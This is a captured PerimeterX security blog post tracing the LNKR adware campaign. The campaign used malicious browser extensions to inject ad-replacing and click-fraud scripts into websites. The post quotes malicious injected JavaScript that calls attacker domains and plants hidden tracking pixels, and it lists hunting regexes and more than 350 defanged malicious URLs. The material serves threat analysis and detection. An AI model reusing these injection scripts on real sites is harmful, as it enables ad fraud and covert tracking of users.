www.perimeterx.com
Open in
urlscan Pro
2400:6180:0:d1::611:8001
Public Scan
URL:
https://www.perimeterx.com/tech-blog/2020/the-missing-lnkr/
Submission: On January 14 via manual from JP — Scanned from JP
Submission: On January 14 via manual from JP — Scanned from JP
Form analysis 1 forms found in the DOM
<form action="" onsubmit="LO.submit_chat(); return false;" __bizdiag="-357996863" __biza="W___">
<div id="lo_chat_input" style="position:relative; width: 100%; ">
<div class="lo-fx-hr" style="height:0px; margin-bottom:0px; margin-top:0px; width:100%; border-top:1px solid #000000;border-bottom:1px solid #4f4f4f"></div>
<div style="padding:10px;"><label for="lo_chat_textarea" style="display:none">Chat Input Box</label><textarea id="lo_chat_textarea" disabled="disabled" rows="2"
style="color: black; background-color: rgb(255, 255, 255); border-radius: 5px; padding: 7px; height: auto; width: 100%; font-family: sans-serif; text-transform: none; resize: none;" dir="null" data-last-scroll-height="0"></textarea></div>
<div id="lo_chat_sound_holder" style="position:absolute; right:0px; top:-25px; width:100%;">
<div style="cursor: pointer; float:right; opacity:0.6; padding-right:10px; height:16px;" id="lo_chat_sound"><img alt="Click to mute chat sounds" src="https://d10lpsik1i8c69.cloudfront.net/graphics/sound-on-white.png"></div>
<div id="lo_chat_status" style="padding-left:10px; font-size:11px; color:#6d6d6d"></div>
<div style="clear:both;"></div>
</div>
</div>
</form>Text Content
* Subscribe
* Careers
* Visit PerimeterX.com
* Search
* Tech Blog
* The Missing LNKR
THE MISSING LNKR
by Ben BaryoOctober 22, 2020
* Share
*
*
*
*
How we connected several incidents our clients’ end-users experienced to a broad
ad injection campaign spanning end-users across much of our customer base.
FIRST INCIDENTS
During a new integration of PerimeterX Code Defender in July, the customer
alerted us that they had received complaints that several of their end users had
experienced fraud after submitting payment details into their website. Our
review of the code running on their website revealed nothing malicious.
We then used our visibility into their site and found a very small percentage of
end users experiencing Javascript injections which contacted unexpected domains.
The small number of affected users made it not likely to be a Magecart attack,
as those usually run on as many users as possible instead of a small subset, but
we wanted to dot all the i’s and cross all the t’s to verify this wasn’t a more
elaborate, targeted attack.
The unexpected domains we encountered, guxuladebu[.]com and wejekihota[.]com,
have been registered as recently as 04/2020 and were both tagged as high-risk by
our domain intelligence provider. The scripts which were detected in the
compromised sessions were injected into the payment iframe, and taking a close
look at them revealed unobfuscated code, which included comments and full
variable names. The scripts seemingly “only” inject ads and trackers into the
page.
THE INITIAL ADWARE INJECTION
The opening lines of one of the injections:
var alreadyLoadedMnz = true;
try {
if (typeof(alreadyLoadedFdzScript) == "undefined") {
var euPlugin = true;
var alreadyLoadedFdzScript = true;
var mainPluginKey = "8kime1SUSnpFEB9EJs$JTA";
var countryPlugin = "br";
The injected scripts, losudu.guxuladebu[.]com/scripts/js and
fevoki.wejekihota[.]com/scripts/js, both with object and method names such as
fdzAdsManager, fdzNativeAds, pushMoreProducts, and replaceAds, it was easy to
figure out what was going on; The script would seek out existing ads’ elements
and iframes on the page - such as youtube ads, taboola, ligatus or outbrain -
and replace them with its own ads.
replaceAds: function (format, element) {
return new Promise(function (resolve) {
if (element.height > 200) {
jKiri.getJSON(
dynamicURL('https://debezihe[.]wejekihota[.]com/assets/nataurl?width='
+ element.width + '&height=' + element.height + '&h='
+ btoa(document.location.host) + '&pk=' + mainPluginKey + '&callback=?'),
null, function (json) {
if (json.url) {
if (jKiri('.native_adn').length >= fdzNativeAds.limit) {
return resolve();
}
if (!document.body.contains(element.item[0])) {
return resolve();
}
element.item.replaceWith(jKiri('<iframe class="native_adn" src="'
+ json.url + '" width="' + element.width + '" height="'
+ element.height
+ '" style="border:none;display:block;margin:auto" />'));
if (json.boost_type && json.boost_type == "ctz") {
fdzNativeAds.trackEvent("show", "native_ads_ctz", element.width + "x"
+ element.height, json.url);
} else if (json.boost_type && json.boost_type == "adthink") {
fdzNativeAds.trackEvent("show", "native_ads_adthink", element.width + "x"
+ element.height, json.url);
} else {
fdzNativeAds.trackEvent("show", "native_ads", element.width + "x"
+ element.height, json.url);
}
return resolve();
} else {
return resolve();
}
});
} else {
return resolve();
}
})
}
It would read specific input fields, such as on google’s shopping tab and other
geo-specific sites (the scripts we first analyzed included targeted French
speaking users) and inject ads based on the search query, with specific
hardcoded categories such as flights and car rentals.
FSGROUP AND GOOGLE SEARCH RESULTS
These Fdz variables can be found on sites as early as 2017, but a more
interesting find was the injection of another script from
www.searchdirect[.]info/script/kr.php?uid=F248A67B54944A7A45101F4426CF894C&a=8383_
which starts with declaring a few unique variables:
var fsgroup = "28";
var trkid = '5f10493b02471';
var uid = 'F248A67B54944A7A45101F4426CF894C';
var affid = '8383';
var dom = 'www.searchdirect[.]info';
This file is another adware which replaces google’s search results with its own
ads, based on a detected keyword in the query string. The script then fake
clicks its injected ads to generate revenue. It also tracks which ads are
displayed on the page and injects beacon trackers.
ANOTHER INJECTION
Another suspicious injection was found to be hosted on Amazon’s AWS:
s3.amazonaws[.]com/jscache/19ff3cca12e47e3099.js and was much noisier than the
previous two:
(function(f, i, j) {
var g = "19ff3cca12e47e3099";
var b = (function() {
var l = 3;
var p = parseInt("0");
var o = parseInt("0");
(function() {
var r = ["mid=", "wid=52190", "sid=", "tid=6655", "rid=LAUNCHED"];
a = (window.location.protocol == "http:" ? "http:" : "https:") + "//promlinkdev[.]com/metric/?" + r.join("&");
var q = f.createElement("img");
q.setAttribute("style", "width:0;height:0;display:none;visibility:hidden;");
q.src = a + (a.indexOf("?") == -1 ? "?" : "&") + "t=" + (new Date().getTime());
(document.head || document.documentElement).appendChild(q);
if (typeof q.onload != j) {
q.onload = function() {
q.parentNode && q.parentNode.removeChild(q)
}}})();
It is minimized, and includes among other things:
* Methods to report to C2 (Command & Control) and receive callback functions to
run
* A hardcoded list of specific domains and TLDs not to inject to
E.g. lotterysambadresult[.]in, paypal[.]com, anything [.]gov, etc…
* A hardcoded list of sites to inject specific banners to, most are in the
Russian language
E.g. mail[.]ru, rambler[.]ru, mysearch[.]com, securesurf[.]biz, etc...
* Static ads injections as iframes
* Injections of affiliation links
* Facebook injection
* Geolocation based injection allow and deny lists
* Redirection of searches to affiliated search engines
* Ability to inject nodes to input fields and textareas
Besides the fact that it’s much more robust and sophisticated than the previous
injection, there was once again the loading of another script,
www.findsearchresults[.]info/script/r.php?a=3200&uid=52190x0000xzzzzzzzzzzzzzzzzzzzzz
which turned out to be another fsgroup script, mostly identical to the last one:
var fsgroup = "20";
var trkid = '5f201f06995c8';
var uid = '52190X0000XZZZZZZZZZZZZZZZZZZZZZ';
var affid = '3200';
var dom = 'www.findsearchresults[.]info';
UNDER THE RADAR
These couple of injections were seen in a small percentage of end-users, and
coupled with the lack of evidence for the site being compromised, we assumed it
must be a client-side injection, probably malware based, or a malicious browser
extension. There was no further action to be taken.
THINGS ARE CLEARER THE SECOND TIME AROUND
A couple of days later, another incident surfaced. Though the offending
injection originated from a domain tagged as high-risk, it was a match for the
script injected from AWS: hardyload[.]com/22783aa0106c0e89f2.js
(function(f, i, j) {
var g = "22783aa0106c0e89f2";
var b = (function() {
var l = 3;
var p = parseInt("0");
var o = parseInt("0");
(function() {
var r = ["mid=", "wid=52658", "sid=", "tid=8824", "rid=LAUNCHED"];
a = (window.location.protocol == "http:" ? "http:" : "https:") + "//hardyload[.]com/metric/?" + r.join("&");
var q = f.createElement("img");
q.setAttribute("style", "width:0;height:0;display:none;visibility:hidden;");
q.src = a + (a.indexOf("?") == -1 ? "?" : "&") + "t=" + (new Date().getTime());
(document.head || document.documentElement).appendChild(q);
if (typeof q.onload != j) {
q.onload = function() {
q.parentNode && q.parentNode.removeChild(q)
}}})();
And just like the previous case, it also loaded the fsgroup script, this time
from www.findsearchresults[.]info/script/r.php?a=...
Again, not many sessions displayed this injection and so this was considered to
be another case of client-side malware / rogue extension.
CONNECTING THE DOTS
While there were two different initial injections, the one starting with
alreadyLoadedMnz and the one with the /metric/? in its path, both were adware
and both injected the fsgroup script. The injections were also only witnessed in
a relatively negligent number of sessions, but we were interested in knowing if
this was perhaps a targeted attack against the customer’s users or a general
case of client-side infection.
EXTRACTING IOCS
To better understand the spread of these injections, we extracted the following
regexp IoCs:
* /script/js\?k=
* /metric/?\?mid=
For both /metric/?mid= and /metric?mid=
* /optout/[gs]et
For both /optout/get and /optout/set
* ^(https?:)?//[^/]+?/[a-f0-9]{18}\.js$
Pretty generic, but surprisingly returns good results. A good way to remove
false positives is to verify both letters and numbers make up the filename
IS IT JUST ME?
Armed with the IoCs, we searched across our customers for compromised end-users
in the past week, and found:
* About 120 different domains with requests matching our IoCs
* Almost all of our Code Defender customers had compromised users visiting
their sites
* The number of compromised users wasn’t significant compared to the number of
overall visitors to the site
The numbers aren’t staggering to say the least, but from week to week they were
consistent and everywhere.
The injections seems to be coming from either Chrome or Firefox browsers, and
not from mobile devices, reaffirming our hypothesis that this was a case of
malicious extension / client-side malware:
WHERE THINGS GOT INTERESTING
One of the tools we use during our investigation is HTTP Archive which we
usually search using Google’s BigQuery. We were wondering if perhaps we could
find the injections somewhere else on the web. We first looked for more
occurrences of the injections we already have; perhaps finding them in context
will yield new information? If they are indeed client-side injections we expect
not to find any matches. So we first searched for sites which communicate with
our already seen domains:
SELECT * FROM `httparchive.response_bodies.2020_08_01_desktop`
WHERE
REGEXP_CONTAINS(url, r'.*(guxuladebu\.com|wejekihota\.com|searchdirect\.info|findsearchresults\.info).*');
And surprisingly we found injections matching those we’ve seen! Not many, but we
weren’t expecting to find any! We looked for more examples by searching for
unique strings within the injections:
SELECT * FROM `httparchive.response_bodies.2020_08_01_desktop`
WHERE
body LIKE '%/log/?l=error&m="%'
OR body LIKE "var alreadyLoadedMnz%";
This yielded almost 300 results, from different sites, with the injected scripts
coming from different domains, with the request URLs all matching our IoCs.
We got practically the same results when we searched for our IoCs with the
following query:
SELECT DISTINCT page FROM `httparchive.requests.2020_08_01_desktop`
WHERE
(REGEXP_CONTAINS(url, r'^(https?):?//[^/]+?/[a-f0-9]{18}\.js$')
AND NOT REGEXP_CONTAINS(url, r'^(https?):?//[^/]+?/[0-9]{18}\.js$')
AND NOT REGEXP_CONTAINS(url, r'^(https?):?//[^/]+?/[a-f]{18}\.js$'))
OR REGEXP_CONTAINS(url, r'.*(/script/js\?k=|/optout/[gs]et).*');
Why would what we thought was a client-side injection be embedded into sites?
THE MISSING LNKR
Intrigued, we looked further into the domains involved, and found one of them,
cdnapps[.]us, was registered with the email frankomedison1020@gmail.com and a
quick google search led us to a KrebsOnSecurity blog entry from March, 2020
which described a similar situation to what we started with, attributed to
malicious extensions. The extensions might not have started malicious but were
later sold to new owners who turned them into adware. Krebs goes on to suggest
how sites were embedded with the same injections - the sites were edited
in-browser, while a malicious extension was running in the background, which
resulted in malicious code injected into the pages during the online edit.
A more recent blog entry from Netskope refers to this as a LNKR campaign, named
after a string found in its earlier iterations back in 2016.
A security researcher named Paul Buonopane has described the LNKR injections,
gave several IoCs, and also analyzed a fake extension which was a copy of a
legit extension with the malicious injections appended to it.
WHAT DO YOU MEAN IT’S ALREADY TAKEN CARE OF?
Now that we had a firmer grasp of what our customers were facing, we knew where
to look for guarding against an extension injecting into the session: PerimeterX
Page Defender. As it turned out, all of our Page Defender customers were already
covered, as any request matching one of the IoCs was already spotted and
blocked.
TO CONCLUDE
We hope that sharing our journey from the first incident to the identification
of the threat and finding the right tool for remediation will give you insight
into the way we look at threats. At PerimeterX we research different web
threats, from hacked servers, through compromised 3rd-party vendors, to
client-side injections. Owing to that we were able to connect the dots and
quickly identify the solution - Page Defender, which already blocks the
malicious extensions from interfering with the session. Our products sharing a
platform means we can leverage intel and capabilities for quick deployment of
solutions.
BUT WHAT CAN YOU DO AS AN END-USER?
As obvious as It may sound, It’s important to stay cautious and look for warning
signs when downloading extensions. If at any time you notice changes in your
browsing experience (unexpected ads, links being added, etc...) you should
review the extensions installed on your browser, perhaps turning them off one at
a time to identify the culprit, and consider uninstalling those which are no
longer relevant.
ADDENDUM: ADWARE URLS
Though not exhaustive, this list includes more than 350 URLs which matched the
IoCs mentioned above. We wanted to include just the domains at first, but since
not all of these domains are inherently malicious (as is the case of
amazonaws[.]com), the domain + path can be used to detect the existence of this
adware in the network.
minisrclink[.]cool/metric/
cosmeticsrc[.]com/metric/
mikkiload[.]com/metric/
miragework[.]com/metric/
dakotaram[.]com/metric/
dogsamily[.]net/metric/
cilkonlay[.]com/metric/
cosmeticsrc[.]com/optout/get
peterfire[.]net/metric/
qalitygigant[.]com/metric/
fileryjon[.]com/metric/
cosmeticsrc[.]com/optout/set/lat
cosmeticsrc[.]com/optout/set/lt
minisrclink[.]cool/optout/get
minisrclink[.]cool/optout/set/lat
minisrclink[.]cool/optout/set/lt
hardyload[.]com/metric/
mikkiload[.]com/optout/set/lat
mikkiload[.]com/optout/set/lt
mikkiload[.]com/optout/get
cozytech[.]biz/metric/
cosmeticsrc[.]com/2171de9c9971669bb5.js
autroliner[.]com/metric/
joyshoul[.]com/metric/
practiclick[.]xyz/metric/
petercontry[.]net/metric/
clicksapp[.]net/metric/
loungesrc[.]net/metric/
jaretsummer[.]com/metric/
biglinksrc[.]cool/metric/
tracksmall[.]com/metric/
makesure[.]biz/metric/
blinkjork[.]com/metric/
trableflick[.]com/metric/
tribedone[.]org/metric/
dimagesrc[.]com/metric/
simonzody[.]com/metric/
amptylogick[.]com/metric/
dogsamily[.]net/optout/get
miragework[.]com/optout/get
miragework[.]com/optout/set/lat
miragework[.]com/optout/set/lt
massehight[.]com/metric/
goldapps[.]org/metric/
mirakay[.]biz/metric/
dogsamily[.]net/optout/set/lat
dogsamily[.]net/optout/set/lt
peterfire[.]net/optout/set/lat
peterfire[.]net/optout/set/lt
joyshoul[.]com/optout/set/lat
joyshoul[.]com/optout/set/lt
peterfire[.]net/optout/get
losudu.guxuladebu[.]com/scripts/js
qalitygigant[.]com/optout/set/lat
qalitygigant[.]com/optout/set/lt
mikkiload[.]com/2299156fcd9f4015b0.js
proxdevcool[.]com/metric/
qalitygigant[.]com/optout/get
criticalltech[.]com/metric/
keanyjoy[.]com/metric/
joyshoul[.]com/optout/get
craftprimes[.]com/metric/
ciclonrox[.]com/metric/
cosmeticsrc[.]com/optout/set/strtm
cosmeticsrc[.]com/optout/set/userid
cilkonlay[.]com/optout/get
blancfox[.]com/metric/
cilkonlay[.]com/optout/set/lat
cilkonlay[.]com/optout/set/lt
untsorce[.]cool/metric/
acountscr[.]cool/metric/
milkpload[.]net/metric/
pagescr[.]cool/metric/
peterfire[.]net/22a3c76046f79dd0be.js
qalitygigant[.]com/227ee61cbd084e801b.js
mikkiload[.]com/22bc07df48b043c1f3.js
dimagesrc[.]com/21b4eb3b66b8d5e9bb.js
joyshoul[.]com/22bd1a92d57466cd6c.js
dakotaram[.]com/22f6f6120c25710dec.js
fileryjon[.]com/optout/get
fileryjon[.]com/optout/set/lat
fileryjon[.]com/optout/set/lt
clipsold[.]com/metric/
fileryjon[.]com/1ddcff471efda26278.js
minisrclink[.]cool/1e40c8bd4601a5a5a4.js
clicksapp[.]net/215bde2d6ed49fe715.js
clicksapp[.]net/215d9d5ddc1c1332ef.js
mabydick[.]com/metric/
autroliner[.]com/optout/get
autroliner[.]com/optout/set/lat
autroliner[.]com/optout/set/lt
data1.molaroute[.]com/scripts/js
kellyfight[.]com/metric/
statsrc[.]cool/metric/
makesure[.]biz/1dbe49b2db08327925.js
makesure[.]biz/optout/set/lat
makesure[.]biz/optout/set/lt
appslinker[.]net/metric/
hardyload[.]com/optout/set/lat
hardyload[.]com/optout/set/lt
leepraktic[.]net/metric/
makesure[.]biz/optout/get
proghage[.]com/metric/
cehute.ramitetuha[.]com/scripts/js
contendevff[.]com/metric/
craftprimes[.]com/optout/set/lat
craftprimes[.]com/optout/set/lt
data1.routepilipinas[.]com/scripts/js
biglinksrc[.]cool/optout/get
biglinksrc[.]cool/optout/set/lat
biglinksrc[.]cool/optout/set/lt
poruce.neyelanane[.]com/scripts/js
craftprimes[.]com/optout/get
jemova.wurucozujo[.]com/scripts/js
webnicolas[.]net/metric/
blancfox[.]com/1ff0d80f515755dcf2.js
craftprimes[.]com/20618468c2f7627774.js
giraslide[.]com/metric/
autroliner[.]com/225cd6e1ef3a4470f9.js
tracksmall[.]com/optout/set/lat
tracksmall[.]com/optout/set/lt
tribedone[.]org/optout/get
tribedone[.]org/optout/set/lat
biglinksrc[.]cool/1ee798437b5f5d4f98.js
dowlextff[.]com/metric/
fuhupo.lohuwomenu[.]com/scripts/js
mirakay[.]biz/optout/get
mirakay[.]biz/optout/set/lat
mirakay[.]biz/optout/set/lt
petercontry[.]net/optout/set/lat
petercontry[.]net/optout/set/lt
tracksmall[.]com/optout/get
joyshoul[.]com/optout/set/strtm
joyshoul[.]com/optout/set/userid
petercontry[.]net/optout/get
promclickapp[.]biz/1e6ab715a3a95d4603.js
ruzozi.locixugoro[.]com/scripts/js
tribedone[.]org/optout/set/lt
blinkjork[.]com/optout/set/lat
blinkjork[.]com/optout/set/lt
dowlextff[.]com/1d61f2beb014840140.js
hardyload[.]com/optout/set/strtm
hardyload[.]com/optout/set/userid
skillapp[.]net/metric/
blinkjork[.]com/optout/get
crisdomson[.]com/metric/
ideafrank[.]com/metric/
keanyjoy[.]com/optout/get
poligloteapp[.]org/metric/
trableflick[.]com/optout/get
amptylogick[.]com/22a1d8e534b29520d0.js
amptylogick[.]com/optout/get
amptylogick[.]com/optout/set/lat
amptylogick[.]com/optout/set/lt
crisgrey[.]com/188f9ebcdf6890da18.js
darkflags[.]net/metric/
keanyjoy[.]com/optout/set/lat
keanyjoy[.]com/optout/set/lt
mirakay[.]biz/optout/set/strtm
mirakay[.]biz/optout/set/userid
practiclick[.]xyz/optout/set/lat
practiclick[.]xyz/optout/set/lt
promfflinkdev[.]com/1dc30897dfecc6dc73.js
simonzody[.]com/20c3dc56895944c2b8.js
trableflick[.]com/optout/set/lat
tribedone[.]org/20ca34c96a123576ab.js
cilkonlay[.]com/21890722da51ec3508.js
comtakelink[.]xyz/metric/
criticalltech[.]com/optout/get
criticalltech[.]com/optout/set/lat
criticalltech[.]com/optout/set/lt
hardyload[.]com/optout/get
loungesrc[.]net/optout/set/lat
loungesrc[.]net/optout/set/lt
practiclick[.]xyz/optout/get
proxdevcool[.]com/optout/get
proxdevcool[.]com/optout/set/lat
simonzody[.]com/optout/get
simonzody[.]com/optout/set/lat
simonzody[.]com/optout/set/lt
singtraff[.]cool/metric/
goldapps[.]org/optout/get
goldapps[.]org/optout/set/lat
goldapps[.]org/optout/set/lt
jaretsummer[.]com/optout/get
jaretsummer[.]com/optout/set/lat
jaretsummer[.]com/optout/set/lt
practiclick[.]xyz/151d61b828942a88fe.js
proxdevcool[.]com/optout/set/lt
trableflick[.]com/optout/set/lt
tribedone[.]org/20cebcfbc0d833c4d4.js
untsorce[.]cool/optout/set/lat
untsorce[.]cool/optout/set/lt
zerafe.dodecawube[.]com/scripts/js
appslinker[.]net/2135df0d2c8958bb24.js
contendevff[.]com/optout/get
crisdomson[.]com/optout/set/lat
crisdomson[.]com/optout/set/lt
dogsamily[.]net/optout/set/strtm
dogsamily[.]net/optout/set/userid
files-js-ext.s3.us-east-2.amazonaws[.]com/22fae55717eaadaf7d.js
ideafrank[.]com/optout/get
petercontry[.]net/optout/set/strtm
petercontry[.]net/optout/set/userid
protesidenext[.]com/metric/
tracksmall[.]com/2279d81d48c75df8ff.js
untsorce[.]cool/optout/get
amptylogick[.]com/optout/set/strtm
amptylogick[.]com/optout/set/userid
biglinksrc[.]cool/1ece0ed8f49de8d8d2.js
buvihi.xixuzutage[.]com/scripts/js
ciclonrox[.]com/optout/set/lat
ciclonrox[.]com/optout/set/lt
contendevff[.]com/167dc90a2dac606b7f.js
contendevff[.]com/optout/set/lat
contendevff[.]com/optout/set/lt
data1.blicougi[.]com/scripts/js
fevoki.wejekihota[.]com/scripts/js
icelandsue[.]com/metric/
loungesrc[.]net/2263eddcb82daefb75.js
loungesrc[.]net/optout/get
peterfire[.]net/optout/set/strtm
peterfire[.]net/optout/set/userid
platewolf[.]com/metric/
plusdroop[.]net/metric/
proghage[.]com/200321535194dcd04f.js
proghage[.]com/optout/get
proghage[.]com/optout/set/lat
proghage[.]com/optout/set/lt
promfflinkdev[.]com/1dbde180289f843d45.js
untsorce[.]cool/1f90ebeaf3ebeede5d.js
acountscr[.]cool/1e3de9b8ae5c976faf.js
blinkloide[.]com/metric/
ciclonrox[.]com/optout/get
clicksapp[.]net/21604a2096b709a1b4.js
data1.bmi-result[.]com/scripts/js
data1.padirmua[.]com/scripts/js
giraslide[.]com/optout/get
goldapps[.]org/1bb8d5dee1eb4904d8.js
goldapps[.]org/2249d46c4ea44f4b35.js
jigepu.macudivida[.]com/scripts/js
jozeha.levitokitu[.]com/scripts/js
linkangood[.]com/21ef897172770ca75d.js
milkpload[.]net/optout/get
milkpload[.]net/optout/set/lat
milkpload[.]net/optout/set/lt
pagescr[.]cool/16dc1947c10ee7d085.js
pagescr[.]cool/optout/get
pagescr[.]cool/optout/set/lat
pagescr[.]cool/optout/set/lt
practiclick[.]xyz/18b181560802361ac2.js
proudflex[.]org/213db237bbd6bf854a.js
transmapp[.]com/22876adb33772fed1c.js
tribedone[.]org/optout/set/strtm
tribedone[.]org/optout/set/userid
untsorce[.]cool/optout/set/strtm
untsorce[.]cool/optout/set/userid
webnicolas[.]net/optout/get
webnicolas[.]net/optout/set/lat
webnicolas[.]net/optout/set/lt
wusote.hirizasune[.]com/scripts/js
acountscr[.]cool/optout/get
acountscr[.]cool/optout/set/lat
acountscr[.]cool/optout/set/lt
billyjons[.]net/21db1c5c8b372aecca.js
blinkjork[.]com/2169d6bf46fe8cf4e4.js
brigstoneapp[.]com/metric/
clicksapp[.]net/216bf7a0541cc1f953.js
cloudjs.netlify[.]com/1b0166cba6a2cf5418.js
comtakelink[.]xyz/1efc51d492f1470cde.js
comtakelink[.]xyz/optout/get
comtakelink[.]xyz/optout/set/lat
comtakelink[.]xyz/optout/set/lt
crisdomson[.]com/optout/get
darkflags[.]net/optout/get
data1.amorff[.]com/scripts/js
data1.arirs[.]com/scripts/js
data1.emizol[.]com/scripts/js
data1.ilipol[.]com/scripts/js
data1.pletar[.]com/scripts/js
giraslide[.]com/optout/set/lat
giraslide[.]com/optout/set/lt
ideafrank[.]com/optout/set/lat
ideafrank[.]com/optout/set/lt
kafiro.kuwinesume[.]com/scripts/js
kellyfight[.]com/optout/get
kellyfight[.]com/optout/set/lat
kellyfight[.]com/optout/set/lt
leepraktic[.]net/optout/get
leepraktic[.]net/optout/set/lat
leepraktic[.]net/optout/set/lt
mabydick[.]com/optout/get
mabydick[.]com/optout/set/lat
mabydick[.]com/optout/set/lt
massehight[.]com/optout/get
massehight[.]com/optout/set/lat
massehight[.]com/optout/set/lt
miragework[.]com/2255f170533dc275d7.js
mocadi.wisoyekivo[.]com/scripts/js
pingclock[.]net/21db1c5c8b372aecca.js
sijeno.fufesikera[.]com/scripts/js
skillapp[.]net/optout/get
skillapp[.]net/optout/set/lat
skillapp[.]net/optout/set/lt
smackbolt[.]com/2092da88402465d887.js
statsrc[.]cool/1f15217cf56f39194a.js
statsrc[.]cool/optout/get
statsrc[.]cool/optout/set/lat
statsrc[.]cool/optout/set/lt
trableflick[.]com/2271398b0972c49255.js
blancfox[.]com/1f2cf4f473fe9a5b05.js
blancfox[.]com/optout/get
blancfox[.]com/optout/set/lat
blancfox[.]com/optout/set/lt
brigstoneapp[.]com/22c4d87c9433e6bd0d.js
brigstoneapp[.]com/optout/set/lat
brigstoneapp[.]com/optout/set/lt
ciclonrox[.]com/21d4a10d5bc3d00d52.js
clipsold[.]com/21b344a7264ba4c14a.js
clipsold[.]com/optout/set/lat
clipsold[.]com/optout/set/lt
clipsold[.]com/optout/set/strtm
clipsold[.]com/optout/set/userid
cloudjs.netlify[.]com/1aff3cd773129c7ef9.js
crisdomson[.]com/optout/set/strtm
crisdomson[.]com/optout/set/userid
darkflags[.]net/optout/set/lat
darkflags[.]net/optout/set/lt
data1.ahjilop[.]com/scripts/js
data1.argmeteo[.]com/scripts/js
data1.grasow[.]com/scripts/js
data1.motibaba[.]com/scripts/js
data1.plantul[.]com/scripts/js
dekixu.sepopesuja[.]com/scripts/js
dimagesrc[.]com/optout/get
dimagesrc[.]com/optout/set/lat
dimagesrc[.]com/optout/set/lt
fileryjon[.]com/1a855c56ef7ae15d9d.js
hardyload[.]com/22783aa0106c0e89f2.js
hejana.lejesigufi[.]com/scripts/js
jebaye.gumagerudo[.]com/scripts/js
jejoro.miyinokejo[.]com/scripts/js
joyglasses[.]net/metric/
kellyfight[.]com/optout/set/strtm
kellyfight[.]com/optout/set/userid
luzino.kumureyole[.]com/scripts/js
makesure[.]biz/1c9285ea04bd586ce3.js
meyune.jaceloregi[.]com/scripts/js
minisrclink[.]cool/optout/set/strtm
minisrclink[.]cool/optout/set/userid
najiwu.xeyutezepo[.]com/scripts/js
plankjock[.]com/20c1f9347f59cf976e.js
platewolf[.]com/optout/get
plusdroop[.]net/optout/get
protesidenext[.]com/d7903748defdb4e905.js
protesidenext[.]com/optout/get
protesidenext[.]com/optout/set/lat
protesidenext[.]com/optout/set/lt
singtraff[.]cool/1e807542320a86c32c.js
singtraff[.]cool/optout/get
singtraff[.]cool/optout/set/lat
singtraff[.]cool/optout/set/lt
singtraff[.]cool/optout/set/strtm
singtraff[.]cool/optout/set/userid
skillapp[.]net/21449c4855c9415c00.js
vedeyo.razegawomi[.]com/scripts/js
wocaga.fecukuhote[.]com/scripts/js
yatulo.yibivacaji[.]com/scripts/js
yotejo.cevocoxuhu[.]com/scripts/js
* Share
*
*
*
*
* BEN BARYO
Cyber Security Researcher in R&D
*
JOIN OUR GROWING TEAM
Explore Openings
EXPLORE MORE
* blog
PROPAGATING PHISHING VIA SLACK WEBHOOKS
Read More
by Amir Shaked
* Bot Protection
CAPTCHA-SOLVERS: SOLVED
Read More
by Carmel Gur
* Digital Skimming and Magecart
THE EVOLUTION OF A MAGECART ATTACK LEVERAGING THE RECAPTCHA.TECH DOMAIN
Read More
by Ben Baryo
PRODUCTS
*
* ALL PRODUCTS
* Bot Defender
* Code Defender
* Credential Intelligence
* Page Defender
* Hype Sales Protection
* Integrations
* Platform
SOLUTIONS
* INDUSTRY
* Digital Enterprises
* E-commerce
* Financial Services
* Food Delivery Services
* Travel and Hospitality
* Media
* THREATS
* Account Takeover
* Carding
* Denial of Inventory and Scalping
* Digital Skimming and Magecart
*
* PII Harvesting
* Skewed Analytics
* Web Scraping
RESOURCES
* ALL RESOURCES
* Case Studies
* E-books
* Infographics
* Podcasts
* Product Briefs
*
* Reports
* Solution Briefs
* Tools
* Videos
* Webinars
* Whitepapers
*
* Learning Center
*
* Blog
* Tech Blog
*
* Compliance
* Services and Support
ABOUT
*
* ABOUT US
* Careers
* Contact Us
* Events
* Leadership
*
* Logo
* Newsroom
* Partners
© PerimeterX, Inc. All rights reserved.
*
*
*
*
*
* Privacy Policy
* CA Privacy Rights
* ContactUs
* RequestDemo
PRIVACY PREFERENCE CENTER
When you visit any website, it may store or retrieve information on your
browser, mostly in the form of cookies. This information might be about you,
your preferences or your device and is mostly used to make the site work as you
expect it to. The information does not usually directly identify you, but it can
give you a more personalized web experience. Because we respect your right to
privacy, you can choose not to allow some types of cookies. Click on the
different category headings to find out more and change our default settings.
However, blocking some types of cookies may impact your experience of the site
and the services we are able to offer.
Allow All
MANAGE CONSENT PREFERENCES
TARGETING COOKIES
Targeting Cookies
These cookies may be set through our site by our advertising partners. They may
be used by those companies to build a profile of your interests and show you
relevant adverts on other sites. They do not store directly personal
information, but are based on uniquely identifying your browser and internet
device. If you do not allow these cookies, you will experience less targeted
advertising.
Cookies Details
FUNCTIONAL COOKIES
Functional Cookies
These cookies enable the website to provide enhanced functionality and
personalisation. They may be set by us or by third party providers whose
services we have added to our pages. If you do not allow these cookies then some
or all of these services may not function properly.
Cookies Details
ESSENTIAL WEBSITE COOKIES
Essential Website Cookies
* STRICTLY NECESSARY COOKIES
Always Active
These cookies are necessary for the website to function and cannot be
switched off in our systems. They are usually only set in response to actions
made by you which amount to a request for services, such as setting your
privacy preferences, logging in or filling in forms. You can set your browser
to block or alert you about these cookies, but some parts of the site will
not then work. These cookies do not store any personally identifiable
information.
* PERFORMANCE COOKIES
Switch Label label
These cookies allow us to count visits and traffic sources so we can measure
and improve the performance of our site. They help us to know which pages are
the most and least popular and see how visitors move around the site. All
information these cookies collect is aggregated and therefore anonymous. If
you do not allow these cookies we will not know when you have visited our
site, and will not be able to monitor its performance.
Cookies Details
BACK BUTTON PERFORMANCE COOKIES
Vendor Search Search Icon
Filter Icon
Clear
checkbox label label
Apply Cancel
Consent Leg.Interest
checkbox label label
checkbox label label
checkbox label label
* 33ACROSS
HOST DESCRIPTION
VIEW COOKIES
* Name
cookie name
Confirm My Choices
PERIMETERX COOKIE POLICY
We use cookies to ensure the proper function of this website and to improve your
website experience. Click “Accept Cookies” to agree to the current cookie
settings or click “Manage Preferences” to make individual choices and get
details on the cookies in use. For additional information relating to your
privacy take a look at our privacy policy.
Cookies Settings Accept All Cookies
×
–
undefined
Chat Input Box
Chat
Powered by